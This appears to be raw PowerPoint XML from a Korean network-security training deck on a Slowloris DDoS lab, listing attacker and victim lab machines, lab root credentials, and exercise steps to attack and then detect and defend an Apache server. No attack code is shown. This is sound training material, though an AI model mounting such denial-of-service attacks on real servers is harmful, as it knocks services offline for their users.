            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304715AE-F2D4-41B7-862C-8CAB30285A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498" y="899280"/>
            <a:ext cx="5400040" cy="3046857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{689F28BD-F87C-43A6-9DAA-0E83A08F04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1464" y="531887"/>
            <a:ext cx="5400040" cy="2961386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/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24349896-23EB-465B-9AA6-7B5A35EBDB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694714" y="2816679"/>
            <a:ext cx="2506436" cy="4816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Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDFBB7A-FEBD-41D1-A96D-BA74B152BE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1464" y="4973259"/>
            <a:ext cx="5400040" cy="561086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADDB49C-CF5A-4270-9020-7A4668FCB7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1464" y="5601572"/>
            <a:ext cx="5400040" cy="661416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1168875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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인 후 체크박스에 체크를 하고 공격실행 버튼 클릭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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 실행’ 버튼 클릭 시 아래와 같이 완료 화면이 나오고 공격상태가 ‘공격 중’ 으로 변경 됨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16AF5780-4CBF-4818-A7ED-A29178744D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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70375197-22D4-49A9-80A3-09AA59E55E97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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70585ED-F006-4A17-AC42-528EB3578FCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F43B545-E59E-47F8-8221-ABAE840F983B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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8195" name="_x208263200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A08186A6-3DB0-4F8E-B9EF-FF437F7553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180" y="2584448"/>
            <a:ext cx="5400675" cy="168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7" name="_x208263760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26418D75-9CC4-47C1-A243-5F1DFD1A47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1262" y="679233"/>
            <a:ext cx="4221163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9" name="_x208262880">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C1B1EE-0438-4C58-9D22-CEC352F87B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1262" y="1958793"/>
            <a:ext cx="5400675" cy="1700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1" name="_x197188192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FCA90A-682C-45B5-9784-F4332E2470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180" y="934995"/>
            <a:ext cx="5400675" cy="904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323579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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>5) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF9B646-7D29-463F-82C6-FE73F865C0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498" y="703338"/>
            <a:ext cx="5400040" cy="3908806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAB0F42-D264-4B56-9055-8697D1412C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1343" y="760488"/>
            <a:ext cx="3360420" cy="754380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305830731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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Slowloris</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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실습 서버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(10.10.1.101)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에 아파치 웹 서버가 동작하고 있다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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해당 서버를 대상으로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Slowloris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공격을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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수행하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / toor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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-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Slowloris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공격을 수행할 수 있다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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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- Slowloris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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공격을 탐지하고 방어할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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Attacker(Kali linux / 10.10.1.166)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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lang="sv-SE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Victim(CentOS 6.4 / 10.10.1.101)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
